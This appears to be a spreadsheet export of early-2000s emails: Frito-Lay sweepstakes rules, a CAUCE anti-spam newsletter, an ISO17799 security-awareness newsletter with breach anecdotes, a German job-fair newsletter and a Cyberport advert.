 ELSEWHERE AND WHEREVER PROHIBITED BY LAW, INCLUDING BUT NOT LIMITED TO,
 FLORIDA, PUERTO RICO, U.S. VIRGIN ISLANDS AND U.S. MILITARY INSTALLATIONS
 LOCATED IN A FOREIGN COUNTRY.NO PURCHASE NECESSARY. PURCHASE DOES NOT IMPROVE CHANCE OF WINNING. MANY WILL
 ENTER. FEW WILL WIN. ODDS DEPEND ON NUMBER OF ENTRIES RECEIVED.1. ELIGIBILITY: Open only to legal U.S. residents located in the U.S. at the
 time of entry, excluding residents of Florida, Puerto Rico, the U.S. Virgin
 Islands and U.S. military installations located in a foreign country, who had
 online access on or before 1/26/02. Employees, contractors, directors and
 officers of Frito-Lay, Inc. ("Sponsor"), FOX Broadcasting Company, 20th Century
 FOX Television, Regency Entertainment, their respective parent, subsidiary and
 affiliated companies, distributors, printing suppliers for this promotion,
 advertising, fulfillment, judging and promotion agencies (collectively,
 "Promotion Parties"), and their immediate family members and those living in
 their same households are not eligible.2. TO ENTER: Beginning 12:00:01 a.m. E.T. 1/27/02, log on to www.3DsFun.com and
 click on the link on the home page to locate the official entry form. Follow
 on-screen directions to properly complete an entry form and send it
 electronically by 11:59:59 p.m. E.T. 2/11/02. In order for entry to be valid,
 entrants must click on the "I accept" button on the web site. All entries must
 be received no later than 11:59:59 p.m. E.T. on 2/13/02. LIMIT ONE ENTRY PER
 PERSON AND/OR E-MAIL ADDRESS. SUBSEQUENT ENTRIES WILL BE DISQUALIFIED.
 Promotion Parties assume no responsibility for lost, late, misdirected, stolen,
 undelivered, garbled, damaged, or incomplete entries, or for any computer,
 online, telephone or technical malfunctions that may occur. Promotion Parties
 also assume no responsibility for any technical problems in connection with
 transmission or receipt of online entries including faulty electronic data
 transmission, traffic congestion on the Internet or on the web site, hardware
 or software error, equipment failure or malfunction, or other online
 communications problems. In the event of a dispute regarding the identity of
 the person submitting an online entry, entries will be declared made by the
 authorized account holder of the e-mail address submitted at the time of entry.
 "Authorized account holder" is defined as the natural person who is assigned to
 an e-mail address by an Internet Access provider, online service provider, or
 other organization (e.g., business, educational institution, etc.) responsible
 for assigning e-mail addresses for the domain associated with the submitted
 e-mail address. All entries become the property of Sponsor and will not be
 returned to entrant. Automated entries (including but not limited to entries
 made using any script, macro, bot, or sweepstakes service) and facsimiles are
 not allowed. Potential winner may be requested to provide Sponsor with proof
 that the potential winner is the authorized account holder of the e-mail
 address associated with the winning entry.3. WINNER SELECTION: Winners will be selected in a random drawing to take place
 on or about 2/28/02 by an independent judging organization, the judge, whose
 decisions are final and binding on all matters related to the sweepstakes. Odds
 of winning depend on the number of eligible entries received. Winners will be
 notified by e-mail. If any prize or correspondence (including e-mail) regarding
 any prize is returned as non-deliverable, prize may be forfeited and an
 alternate winner selected.  Winners (or winner's parent or legal guardian, if
 winner is a minor) and Grand Prize winner's travel companions (or companion's
 parent or legal guardian for any companion who is a minor) will be required to
 complete, sign and return either a Prize Acceptance/Release and Indemnification
 form or an Affidavit of Eligibility/Liability Release (as directed by Sponsor),
 and, where lawful, a Publicity Release within twenty-one (21) days of winners'
 receipt of documents via e-mail or prize may be forfeited. Grand prize winner
 (or winner's parent or legal guardian, if winner is a minor) and winner's
 travel companions will also be required to complete, sign and return a set
 visit release together with completed I-9 and W-4 forms in order to visit the
 set of Malcolm in the Middle(TM) as described below in paragraph 4. Prizes won
 by minors will be awarded to a parent or legal guardian who must sign all
 required documents.4. PRIZES: ONE (1) GRAND PRIZE: One trip for winner and 3 travel companions of
 winner's choosing to Los Angeles, CA to be completed on or before 12/31/02.
 Trip is for 4 persons but can include up to 8 persons under the following
 conditions: Among winner and the 3 selected travel companions, each traveler
 who is a minor in his/her state of residence must be accompanied by a parent or
 legal guardian of such minor at all times; Sponsor will provide trip
 accommodations for one parent or legal guardian to accompany him/her. Trip
 includes round-trip coach air transportation from a major gateway airport near
 winner's residence within the U.S.; 3 days/2 nights double occupancy standard
 hotel accommodations in the Los Angeles, CA metropolitan area (airport, carrier
 and hotel to be selected by Sponsor); accompanied admission to the set of FOX's
 Malcolm in the Middle(TM) ("MIM") during a non-filming period selected by FOX
 to meet Frankie Muniz; and ground transportation between the California airport
 and hotel, and between the hotel and the MIM set. Grand Prize winner will also
 receive a check for $2,500, 1 MIM script autographed by Frankie Muniz, one
 MIM/3D's(R) brand snacks VIP pack (including 1 backpack, 1 book, 1 hat, 1
 t-shirt, and 1 case consisting of fifteen 7 oz. bags of RUFFLES(R) 3D's(R)
 brand Maximum Cheddar flavored snacks). Approximate Retail Value ("ARV"):
 Between $7,500 and $15,000, depending on winner's point of travel origin and
 how many persons (up to 8) take the trip. All meals, gratuities, and other
 expenses associated with prize trip not specifically mentioned in these rules
 are the winner's sole responsibility. All travel must be taken by the date
 specified; no alternative travel dates are available. Winner, travel
 companions, and any necessary parent(s)/legal guardian(s) (the "travel party")
 must travel on same itinerary. In the event that circumstances prevent the
 travel party from being able to attend the set visit or meet Frankie Muniz, or
 limit this portion of the Grand Prize in any way, the winner agrees that the
 Promotion Parties shall have no obligations other than to deliver the remainder
 of the Grand Prize. FIVE (5) FIRST PRIZES: Manufacturer's coupons redeemable at
 participating retailers for 52 free 7 oz. bags of any 3D'S(R) brand snacks
 (with a retail value up to $2.59). ARV: $135. TEN (10) SECOND PRIZES: One
 MIM/3D's(R) brand snacks VIP pack (including 1 backpack, 1 book, 1 hat, ,1
 t-shirt, and 1 case consisting of fifteen 7 oz. bags of RUFFLES(R) 3D's(R)
 brand Maximum Cheddar flavored snacks). ARV: $100. TWENTY (20) THIRD PRIZES:
 One MIM t-shirt and one MIM hat. ARV: $30. 100 FOURTH PRIZES: One
 manufacturer's coupon redeemable at participating retailers for 1 free bag of
 3D's(R) brand snacks (up to 7 oz. size). ARV: $2.59. Free product coupons
 expire and must be redeemed by 12/31/02. No substitution, cash redemptions or
 transfer of prizes is permitted except at Sponsor's sole discretion. If a prize
 cannot be awarded for any reason, Sponsor reserves the right to substitute any
 prize with another prize of equal or greater value. Any portion of a prize not
 accepted by a winner shall be forfeited. All prizes will be awarded.5. GENERAL CONDITIONS: Sweepstakes is not to be used in connection with any form
 of gambling. Prizes will be awarded and/or delivered only to addresses within
 the United States. Prize winners are solely responsible for any taxes on
 Prizes. This sweepstakes is subject to all federal, state and local laws, and
 Grand Prize winner will receive an IRS Form 1099 for the approximate retail
 value of the prize. By participating, entrants (and their parent(s)/legal
 guardian(s) if entrants are minors) agree to these Official Rules, Sponsor's
 Privacy Policy (available at www.3DsFun.com) and to the decisions of the judge,
 which are final and binding in all respects. If for any reason the sweepstakes
 is not capable of running as planned; including infection by computer virus,
 bugs, tampering, unauthorized intervention, fraud, technical failures, or any
 other causes which corrupt or affect the administration, security, fairness,
 integrity or proper conduct of the sweepstakes, Sponsor reserves the right, at
 its sole discretion, to disqualify any individual who is responsible or who
 tampers with the entry process, and to cancel or terminate the sweepstakes and
 select the winners from all eligible entries received prior to the cancellation
 or termination. This sweepstakes is offered only in the United States and is
 governed by the laws of the state of Texas, with venue in Dallas County, Texas,
 and all claims must be resolved in the federal or state courts of Dallas
 County, Texas.6. LIMITATIONS OF LIABILITY AND RELEASE: By accepting prize, winners (and
 winners' parent(s)/legal guardian(s) if winners are minors) agree that the
 Promotion Parties, participating retailers, and all of their respective
 officers, directors, employees, representatives and agents will have no
 liability whatsoever for, and shall be held harmless by winners against, any
 liability for injuries, losses or damages of any kind to persons or property
 resulting in whole or in part, directly or indirectly, from participation in
 the sweepstakes or acceptance, possession, misuse or use of any prize. Except
 if winners are residents of TN or where prohibited by law, winners (and
 winners' parent(s)/legal guardian(s) if winners are minors) grant (and agree to
 confirm this grant in writing, if requested) permission for Sponsor and those
 acting under its authority to use his/her name, photograph, voice and/or
 likeness, for advertising and/or publicity purposes without additional
 compensation.7. WINNERS' LIST: For a list of winners of prizes valued over $25, mail a
 self-addressed, stamped envelope to be postmarked by 2/11/02 and received by
 2/18/02 to: Malcolm in the Middle(TM) Sweepstakes, Winners' List Requests, P.O.
 Box 1518, Elmhurst, IL 60126.8. SPONSOR: Frito-Lay, Inc., 7701 Legacy Drive, Plano, TX 75024-4099.(c)2002. Frito-Lay, Inc. All rights reserved.Malcolm in the Middle(TM) and (c)2002 Twentieth Century Fox Film Corporation,
 Regency Entertainment (USA) Inc. and Monarchy Enterprises S.a.r.l. All rights
 reserved.
(c)2002. FOX BROADCASTING COMPANY</t>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1			      CAUCE NEWS
			  Volume 6, Number 2
			      June, 2002In this issue:* Progress of Senate anti-spam bill
* European Union bans spamIF YOU DON'T KNOW WHY YOU GOT THIS MESSAGE: Please see the
"About This Message" section at the end.- --------------------------------------------------------------* Progress of Senate anti-spam billOver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laws.The Senate Commerce Committee considered the bill on May 17th, and
reported it out largely unchanged.  It's not now scheduled for further
action in the Senate.CAUCE has always opposed this bill, since we believe it would lead to
more spam, not less.  When South Korea passed a similar opt-out law
last year, spam from Korea soon increased by a factor of 10.Our April 2001 press release goes into more detail about the problems
with S.630: http://www.cauce.org/pressreleases/pr-s630.shtmlWe're pleased that the Congress is looking at spam issues again, and
hope that in the future we can help them create an effective bill that
the entire Internet community can support.- --------------------------------------------------------------* European Union bans spamGLOBAL INTERNET COMMUNITY APPLAUDS EUROPEAN ANTI-SPAM VOTEMay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Europeans."While six European Union member countries had already formalized "opt-in"
in their national laws and regulations, yesterday's vote should turn all
of Europe into a spam-free zone by the end of 2003."Unfortunately, the rest of the world's Internet-using countries,
including the United States, now lag behind Europe in their protection
of Internet users," said CAUCE Chairman Scott Hazen Mueller. "This is
a tremendous first step, but the rest of the world now needs to follow
Europe's lead and unite behind protection of Internet users and
network owners from abusive and costly unsolicited e-mail
advertising.""This decision is the direct result of Internet users throughout the
European Union standing up for their rights, and Members of the
European Parliament listening to their constituents," said Mills. "Our
members and our volunteers performed an integral part of this process,
translating, lobbying and educating their representatives."More information on the E.U. directive is available on the European
Parliament's Web site ,
and a EuroCAUCE analysis is available at
. More information on
the international CAUCE network of affiliate organizations is
available at .- --------------------------------------------------------------About This Message:This message was written and broadcast by the Coalition Against
Unsolicited Commercial E-Mail. It is copyrighted (c) 2002 by the
Coalition Against Unsolicited Commercial E-Mail.We encourage redistribution of this message or items from it, as long
as they are not spammed anywhere, are on-topic for any forum to which
you send them, and include our copyright notice.  When in doubt, post
the URL of our site (http://www.cauce.org) instead, or put it in your
signature.  Press, broadcast, and Internet media may treat this
material as they would a press release. For other commercial
reproduction rights, contact John Levine .*************************************************************************
You have received this message because your address was signed up for
the CAUCE-ANNOUNCE mailing list. If you do not want to receive any
further messages from this list or think you were subscribed without
your knowledge, please use the list's home page       http://lists.cauce.org/mailman/listinfo/cauce-announceor send mail to cauce-announce-request@cauce.org with a subject of
"unsubscribe," or contact J.D. Falk  to be removed
manually. We exist to eradicate unsolicited e-mail, and, unlike
spammers, will honor "remove" requests.On the other hand, if a friend passed along this message to you and
you would like to receive the CAUCE NEWS in the future, visit the
CAUCE web site at http://www.cauce.org to join, or send a message to
cauce-announce-request@cauce.org with a subject of "subscribe" if you
want to subscribe without joining.
*************************************************************************For other questions or comments about this message, contact John
Levine .Note to PGP users: your editor has a new longer key, which you'll need
to verify the signature on this message.  It's available on the usual
key servers.				 # #
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (BSD/OS)
Comment: For info see http://www.gnupg.orgiEYEARECAAYFAjz+Ey4ACgkQkEiFRdeC/kWGPwCeLJwc5kU+dIWdYvZE4fr1DTRO
HfEAnjuW22VH9mi1sPPtUuk+6yUpyABW
=L1WX
-----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">______________________________________________________THE ISO17799 NEWSLETTER - EDITION 4
______________________________________________________Welcome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issue:1)  The ISO17799 Toolkit Uncovered 
2)  Social Engineering - Are you Susceptible?
3)  ISO17799: A World Wide Phenomena
4)  Stranger Danger
5)  ISO17700: More Frequently Asked Questions
6)  Credit Card Transactions - Minimize the Risks
7)  BSI Certifications - Congratulations
8)  ISO17799 Section 11 - BCP Review
9)  It Couldn't Happen Here.... Could It?
10)  Subscription InformationTHE ISO17799 TOOLKIT UNCOVERED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standard's requirements more
quickly.The contents can be broken down into two groups: those that help the
organization to understand where ISO17799 fits and what is involved in
embracing it, and those that help an organization to take the first
critical steps to compliance.In the former group are the 'RoadMap to Certification' (which broadly
describes the process of gaining certification), the 'XL Management
Presentation' (which explains the history, background and current status
of the standard) and of course the ISO17799 standard itself (both
parts).In the latter group are some key items to aid compliance. These include
a comprehensive set of ISO17799 compliant security policies to address
section 3 (Security Policy) and business continuity audit checklists to
help address section 11 (Business Continuity Management).It doesn't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http://www.iso17799-made-easy.comThe standard itself can alternatively be procured from:  
http://www.iso17799.net SOCIAL ENGINEERING - ARE YOU SUSCEPTIBLE?
====================
The term 'social engineering' can conjure up a variety of ideas, usually
based around the concept of genetic tampering. However, when applied to
IT security, it has its own implications and its own vocabulary.Following interviews with known computer criminals, a list of approaches
has been produced. These are designed to gather information without the
target even realizing that they have parted with it.The attempts are often made on an opportune bases, with common locations
for this sort of activity being planes, trains and pubs. The telephone
is probably the major source of pre-meditated acts.  The following are some of the major techniques employed:BAITING
This essentially involves asking a variety of questions, including some
leading questions designed to 'catch' the right answers. Often, items of
conversation are introduced based upon replies received. The fiction is
legitimized with small amounts of fact in the right places.PULLING RANK
This amounts ot the perpetrator assuming a more senior position in the
company than the victim and is usually enacted on the telephone. It does
not necessitate direct impersonation... only the POSITION needs to be
assumed. EXHAUSTING
This involves asking a constant stream of similar questions to wear down
the target.SURF BOARDING
Basically this is looking over someone's shoulder at something
confidential. This could be directly, through a window, through a
doorway, etc.SURVEYS
The information given freely in surveys can often be extremely useful to
a criminal. The surveys can initially be for entirely legitimate
purposes, or can be completely bogus from the start. In either case
sensitive information can often be obtained and unwittingly disclosed.
There are of course many other techniques. However, disclosure can be
prevented via the use of a series of common sense rules and policies. Before releasing any information it is essential to at least establish:a) the sensitivity of the information
b) your authority to exchange or release the information
c) the real identity of the third party (proper authentication)
d) the purpose of the exchangeThe act of exchange should also be recorded for audit purposes.ISO17799 - A WORLD WIDE PHENOMINA ================
Disney would have said "it's a small world after all", but the global
take on of ISO17799 proves that organizations the planet over are
embracing it with enthusiasm.To illustrate the global nature of the standard, we recently created a
table from the last 500 purchases of the standard from the ISO17799
Electronic Shop (www.iso17799.net). The figures below do come with a
serious health warning though - the Electronic Shop is a credit card
purchase system. Some cultures are not as comfortable or familiar as
others with credit card purchase and will therefore have their purchase
position significantly understated. An example is India, which acquires
substantial numbers of the standard, only two of which show in the last
500 from the download location.That aside, the table makes interesting reading:Argentina 1 
Australia 6 
Austria 5  
Barbados 2 
Belgium 5 
Bermuda 1 
Bosnia and Herzegovina 1 
Brasil 2 
Brazil 4 
Canada 52 
Cayman Islands 1 
Chile 3 
China 3 
Colombia 5 
Costa Rica 1 
Croatia 1
Cyprus 1 
Denmark 5 
Deutschland 5  
Egypt 4 
England 26 
France 3 
Germany 20 
Greece 3 
Guatemala 1 
Hong Kong 7 
Hungary 1 
India 2 
Indonesia 2 
Ireland 11 
Isle of Man 1 
Israel 1 
Italia 1 
Italy 20 
Japan 3 
Malaysia 5 
Mexico 9
Netherlands 3 
New Zealand 2 
Northern Ireland 1 
Norway 10 
NZ 1 
Panama 1 
Portugal 1
Russia 3 
Sacramento 1 
Scotland 3 
Singapore 9
Slovak Republic 1
Slovenia 1
South Africa 4
Spain 9 
Sultanate of Oman 1 
Sweden 3 
Switzerland 14 
Taiwan 3 
Thailand 2 
The Netherlands 8
Tunisia 1 
Turkey 1 
U.A.E 1 
UK 51 
United Arab Emirates 2 
United Kingdom 24 
United States 13 
United States of America 25 
USA 176 
Venezuela 2 
STRANGER DANGER
=======
As you read this article, look around at your working environment. The
items/information you have to hand may not seem very sensitive because
you deal with them every day... but now look again.If you were alone and not a member of staff, how would you view them?
What would you find if you looked around? Picture yourself as a visitor
passing through. What can you hear in terms of conversation? What can
you see?The chances are that you can hear and see quite a lot that you would not
want to be openly disclosed to the outside world. If this is the case,
the security of your information is at risk potentially from every
visitor, stranger, subcontractor, etc. This article is not written with the intention of discrediting visitors,
but nonetheless, it is important to be fully AWARE of what CAN happen if
due caution is not exercised.The following guidelines may help in ensuring that the risks are
minimized:* Your reception/visitor area should issue distinctive badges and ensure
that visitors wear them* Consider using different colored badges for each day of the week.* Challenge those who are not displaying any identity badges* If your location issues identity badges - make sure YOU wear yours* Do not be afraid to ask someone who they are visiting and what they
are doing* Do not be lazy... escort visitors from reception (if applicable)...
don't let them make their way to you* Do not hold doors open for people not displaying their ID* Do not leave visitors alone   ISO17799 - MORE FREQUENTLY ASKED QUESTIONS
=====================1) How many controls are there in the standard?
Part 1 is organized into 10 sections. There are 127 main controls and
over 500 detailed controls in total.2) What is part 2?
Part 2 basically explains how to apply the standard itself, and how to
build and operate an information security management system.3) How old is it?
The standard stems from an original publication in 1993, from the DTI in
the UK. It became BS7799 in 1995 and of course ISO17799 in 2000.4) What is accreditation?
An accreditation body can authorize others to "certify" third parties
under the standard (p2). A number of accreditation bodies exist in
different countries.5) Is certification for life?
No. It is normally for three year periods.6) ISO17799 is used throughout the world, but was it internationally
created? Yes indeed. The latest versions included input from
representatives from many nations, including Australia, Brazil, Germany,
Norway, UK and USA, amongst others.7) Is it linked to a specific national legal system?
No. It is generic in terms of legislation.CREDIT CARD TRANSACTIONS: MINIMIZE THE RISKS
======================The use of credit and debit cards to purchase goods and services has
become an everyday convenience that we take for granted, but there are
associated information security risks which we should pause to consider,
especially when making payments over the Internet.  Web sites are becoming an increasingly popular means of purchasing goods
and services, but they have also become popular targets for cyber
criminals, who often use stolen credit card numbers to purchase goods,
which can then be easily exchanged for cash.  There are also relatively
simple technologies now readily available which could be used by hackers
to surreptitiously steal vast amounts of money, a few pounds at a time,
from millions of people. A survey by the IT research company Gartner
(http://www.gartner.com) predicted that Internet crime involving the
"mass victimization" of consumers could take place by the end of this
year.  We recommend the following best practice guidelines to minimize the
risks involved in credit card transactions:* Ensure that credit cards used to purchase goods or services on the
Internet have a low credit limit, or if debit cards are used, that they
have limited funds and are only topped up to cover specific Internet
purchases.* All expenses incurred through Internet transactions should be
carefully audited on a regular basis for any anomalies.* Only enter credit card details on a Web site if you are confident as
to its authenticity and that the connection is secure - the prefix https
(as opposed to the usual http) in the Web Site address indicates a
secure connection.* If the security of a Web site is in doubt, any confidential
information posted to it may be exposed to malicious intent.  Be
extremely cautious when posting confidential details on any site where
the Internet Service Provider hosting the site is not verified. Note
that we have pre-checked all sites referenced in this newsletter for
security!* If ordering by telephone using a credit card, ensure that you are
talking to the correct person.  If you are unsure whether the
organization you are dealing with will handle your details sensitively,
pay by some other means.* Lost or stolen credit card details may be used for Internet
transactions.  Inform the card issuer and relevant person within your
organization immediately if a company credit card is lost or stolen.BSI - CERTIFICATIONS
==========Congratulations to all the following who have been certified by BSI with
respect to BS7799 Part2 for at least one system in at least one
location:7 Global, Accordis Acetate Chemicals Limited, Alenia Marconi Systems
Ltd, American Society of Quality, AMOUN Pharmaceutical Co (Egypt),
Attenda Limited, Business Coach IT Management, CADWEB Limited, Camelot
Group Plc, Capita Business Services, Dai-Ichi Kangyo Bank Limited, DBI
Consulting, Digex, DNP Facility Services Co Limited (Japan), Ericsson
ESPA A S.A., Glaxo Wellcome Manufacturing (Singapore),GlaxoSmithKline,
Hanvit Bank Korea, Hyundai Information Technology, Icfox International,
Intergalis, Logic Systems Management, Macquarie Corporate
Telecommunications Pty Limited Australia, Netstore Plc, NTT Data Corp,
Paramount Computer Systems (UAE), PCCW Business eSolutions Hong Kong,
S-Cube Inc, Serious Fraud Office, Siemens Business Services Trust Center
(Munich), Stiki EHF (Iceland), Sony Bank Inc (Japan), Co-operative Bank
Plc, The University of Texas, Total Network Solutions Limited, Unisys
Limited, Vodafone Telecommerce GMBH, Volex Group Plc
We intend to produce a more complete list in a future newsletter. We
will also include certificates issued by the growing number of other
certification bodies across the world.ISO17799 SECTION 11: BCP REVIEW 
===============
Business continuity planning is covered by section 11 of the standard, a
core requirement of which is the creation and maintenance of a business
continuity plan.Creating such a plan from scratch is a difficult undertaking of course.
This is one reason why software products were produced. Unfortunately
these often become problematic in themselves... difficult to learn,
expensive, etc.Recent times have therefore seen a move to simplification, with
organizations keen to avoid adding complexity to an already complex
task. At the vanguard of this change was a product developed entirely in
MS-Word: The BCP Generator.This was designed from top down to simplify business continuity
planning. It comprises two components: a plan template and an
interactive guide (the latter using Word macros to jump to and fro into
the correct part of the template). It's impact upon the business
continuity scene has been substantial, with organizations from the very
largest to the smallest embracing the tool and its concepts. It is in
active use in over 40 countries.
With this change of emphasis in the business continuity planning market,
there is now NO excuse for not creating a full recovery plan. The old
lines of "too expensive" and "too difficult" are now less hollow than
they ever were. Although section 11 is very clear with respect to the
need of a comprehensive plan, it is surely also a matter of due
diligence to have one, and equally, irresponsibility not to have one.For information on the BCP Generator see: 
http://www.disaster-recovery-plan.comFor information on business continuity generally, see:
http://www.yourwindow.to/business-continuity/ IT COULDN'T HAPPEN HERE....COULD IT?
==================Every issue of The ISO17799 Newsletter features at least one TRUE story
of an information security breach and its consequences. Again, in this
issue, we focus upon 'low tech' but high impact incidents:
1) On 25th October a contract programmer who had once worked for a large
US based bank walked into the 'inner sanctum' of the main building (the
security guards remembered him as someone permitted to do so). In the
dealing room he claimed to be conducting a quality audit and
interrogated a junior employee and watched a program run - noting down
security codes as they were entered. He then left and hung around
outside until just after normal trading time.He then rang the Bank from a public phone box and initiated an
electronic funds transfer using the codes... $10.2m to a Swiss account. The plan nearly failed when he found that he had noted one of the codes
incorrectly, but he rang the Bank department back and incredibly managed
to trick a different employee into revealing the correct digit.He flew to Switzerland and later returned with the money. He was caught
simply because he couldn't resist boasting about his great feat. When
the police contacted the bank they were still totally unaware of their
loss!
2) Remote, or dial-in access can be a real Achilles heel if not properly
controlled. In a recent case a young hacker gained access to a major
company's system by using the default password of a system engineer
(which had never been changed!). This gave him considerable scope and powers of access. To cover for
himself, however, he semi-disabled the machine log, changed a number of
user passwords, created several fictitious privileged users and tampered
with the dial back system.Getting more ambitious he established a communication link with another
computer and ended up making it crash. All this took place over a couple
of evenings.To recover from the havoc the installation had to close down its prime
computer and restore from the previous weeks back-up, at considerable
cost.
3) Over a period of nine months, the number of computer malfunctions
within a large company had risen from an average of two per year to
critical levels. The impact was such that the business fell behind with
its invoicing systems and had to buy processing and backup from third
parties. As it could not deliver some of its services reliably, it
started to lose the confidence of its customers. The situation began to
spiral. Eventually, the company suspected foul play may be involved and called
the police. Secret surveillance equipment was installed to monitor
staff. One was filmed lightly scratching circuit boards in disk units
and also attaching paper clips to them. Both these actions led to a
short circuit.When confronted, he confessed everything. His motive was to earn
overtime, which was required to process the overlap work which was
delayed by the malfunction. He netted 689 UKP over the 9 months. The
company lost at least 500,000 UKP.   CONTRIBUTIONS 
======Have you got something to say on the topic of ISO17799... a fresh
insight or some information which might benefit others? If so, please
feel free to contribute your submission to us. ISO17799 NEWSLETTER REMINDER
==============We hope that you have found this newsletter to be informative, and
hopefully useful in helping to address the ISO17799 issue. Future
editions will pursue these ends further (and will include interviews,
case studies and more). Subscription to the ISO17799 Newsletter is free. Please do feel free to
pass this copy on to friends and colleagues. If you do not wish to
receive further copies, please email us at the address below with a
title of Un-subscribe. If your friends or colleagues wish to receive the newsletter directly,
they should simply send a blank email to: iso17799@securityrisk.co.uk Finally, BinaryNine Ltd accept no liability or responsibility for errors
or omissions in this newsletter. This also applies to any loss or damage
caused, arising directly or indirectly, by the use of or reliance on the
information contained within.  Copyright 2002 </t>
  </si>
  <si>
    <t xml:space="preserve">Hallo Xxxxxxxxx Yyyyyyy,diesen Monat im Newsletter: heisse Karrieregespraeche in kurzen Hosen und
wie Sie mit der Profi-Stellensuche schneller ans Ziel kommen!Viel Erfolg bei der Jobsuche wuenscht Ihnen das
jobfair24-Team--
Inhalt:
---
1. Die erste virtuelle MBA-Messe
2. Virtueller Messetag am Mittwoch, 03. Juli 2002
3. Wir stellen vor: Unternehmen auf der jobfair24
4. Profi-Stellensuche
---
1. Die erste virtuelle MBA-Messe
---
Am Donnerstag, 20. Juni hat sie eroeffnet, die erste virtuelle MBA-Messe im
Internet. Unter www.jobfair24.de/virtualworldmbatour koennen Sie sich bei
rund 40 der Top 100 Business Schools weltweit ueber Studiengaenge,
Schwerpunktthemen, Studiengebuehren, Stipendien, und vieles mehr
informieren. Noch bis zum 04. Juli 2002 sind die 3D-Messehallen fuer Sie
geoeffnet - rund um die Uhr.
Zum virtuellen Messetag am Donnerstag, 27. Juli stehen Ihnen dann zwischen
13 und 19 Uhr die Vertreter der Business Schools in Chat Gespraechen zur
Verfuegung. Wer moechte, kann sich bereits im Vorfeld online fuer
Chat-Termine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...Zur VirtualWorldMBATour gehtÂ´s hier:
http://www.jobfair24.de/virtualworldmbatour/start/---
2. Virtueller Messetag am Mittwoch, 03. Juli 2002
---
Drueckende Hitze draussen und im Buero stehende Luft? Gehen Sie doch einen
Mittwoch nachmittag eher nach Hause und geniessen Sie den Besuch einer
Rekrutierungsmesse - ohne Anzug und ohne Anreise!
Mit einem kuehlen Getraenk in der Hand, in Shorts und T-Sirt koennen Sie
vom eigenen Sofa aus die virtuelle 3D-Job-Messe besuchen und
Karrieregespraeche mit den Personalverantwortlichen zahlreicher
international taetiger Unternehmen fuehren.
Am Mittwoch, 03. Juli 2002 zwischen 13 und 18 Uhr ist es wieder so weit -
also am Besten schon mal die Getraenke kalt stellen ;-)Login: http://www.jobfair24.de/cgi-bin/bewerber/login.cgi---
3. Wir stellen vor: Unternehmen auf der jobfair24
--
Deutsche Krankenversicherung AG - Mit ueber 2,9 mio Versicherten ist die
DKV Europas fuehrender Spezialist fuer die private Krankenversicherung.
2002 wird weiter expandiert und dafuer werden bundesweit
Hochschulabsolventen mit wirtschafts- oder rechtswissenschaftlichem Studium
gesucht. Weitere Infos rund um die DKV stehen im Firmenprofil:
http://www.jobfair24.de/firmen/dkv/profil/dkv.htmlSCA Hygiene Products - Das internationale Unternehmen mit Hauptsitz
Muenchen-Flughafen ist im Bereich Hygiene Producs taetig. Fuer 2002 werden
vor allem Mitarbeiter aus den Bereichen Ingenieurwesen (z.B. Papier,
Verfahrenstechnik, Maschinenbau) aber auch BWL und Informatik gesucht.
Viele weitere Informationen gibtÂ´s im Firmenprofil:
http://www.jobfair24.de/firmen/sca/profil/sca.htmlFirmenprofile der anderen ausstellenden Unternehmen finden Sie hier:
http://www.jobfair24.de/cgi-bin/stellensuche/firmaprofil.cgi--
4. Profi-Stellensuche
---
Heute suchen, im Herbst arbeiten? Klingt gut!
Ein Besuch auf der virtuellen 3D-Job-Messe ist dabei der richtige Weg zum
Traumjob. Um sich ideal auf die Chat-Gespraeche vorzubereiten, sollten Sie
nicht nur Ihre digitale Bewerbungsmappe bereits ausgefuellt haben. 
Auch ein Blick in die Profi-Stellensuche kann sehr hilfreich sein!
Hier koennen Sie nach Berufsfeldern, nach der Art der Einstellung, nach
Laendern,... suchen und dann am Messetag ganz gezielt auf die
Personalmanager zugehen. Das spart Zeit und Nerven.Mal ausprobieren? Einfach hier klicken:
http://www.jobfair24.de/cgi-bin/stellensuche/stellen_suche.cgi?SEARCH=1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
</t>
  </si>
  <si>
    <t xml:space="preserve">  
 Bitte beachten Sie die Angebote unserer Werbepartner. 
Diese ermÃ¶glichen den kostenfreien Betrieb des Fax2Mail-Service. 
Vielen Dank.
Der neue Cyberport-Katalog ist da!
Â 
Reinschauen ist jetzt auch offline mÃ¶glich, mit dem druckfrischen Cyberport-Katalog.
StÃ¶bern Sie in unserem Angebot, wann und wo Sie wollen. Entdecken Sie auf 322 Seiten
sechs interessante Einkaufswelten, randvoll mit topaktuellen Highlights rund um den 
Computer, Telekommunikation und Multimedia - natÃ¼rlich zu absoluten Hammerpreisen.
Bitte registrieren Sie sich hier 
Und hier unsere Shops im Ãœberblick:   
Mac-Shop Â– Cyberdesign fÃ¼r jeden Tag
Â 
Ein Paradies fÃ¼r Apple-Fans! Ob iMac, iBook 
oder PowerMac: Hier finden Sie die 
aktuellsten Modelle Â– und dazu jede Menge 
Software und Peripherie Â– vom Cinema 
Display Ã¼ber Foto-Drucker bis zum neuen 
iPod! 
PC-Shop Â– Power satt fÃ¼r mehr SouverÃ¤nitÃ¤tNatÃ¼rlich kommen Sie bei uns auch als PC-
User voll auf Ihre Kosten: Wir bieten Ihnen 
leistungsstarke PC-Komplettsysteme fÃ¼r 
Home- und Business-Anwendungen, Super-
Zusatzkomponenten fÃ¼r Gamer und 
Multimedia-Freaks sowie Top-EndgerÃ¤te und 
ZubehÃ¶r vom Foto-Scanner bis zum TFT-Display!
Mobile-Shop Â– neueste Technik fÃ¼r 
grenzenlose MobilitÃ¤t 
Willkommen in der mobilen Zukunft! Ob 
Notebook oder PDA, Handy oder 
Navigationssystem: Bei uns finden Freunde 
des mobilen Lebens fÃ¼r jeden Zweck das 
optimale Angebot Â– fÃ¼r mehr Freiheit unterwegs!
Network-Shop Â– Effizienz von Profis fÃ¼r 
Profis
Die ganze Welt von LAN, Switches, Router &amp; 
Co. Hier gibtÂ’s maÃŸgeschneiderte Netzwerk-
LÃ¶sungen fÃ¼r den privaten wie professionellen 
Bedarf Â– von der einfachen Netzwerkkarte bis 
zum Wireless LAN mit Internetzugang, 
Printserver und integrierter Firewall fÃ¼r 
maximale Sicherheit!
Video/Audio-Shop Â– alle Freiheit fÃ¼r Ihre 
WÃ¼nsche
Ob Digital-Foto und -Video, MP3, DVD oder 
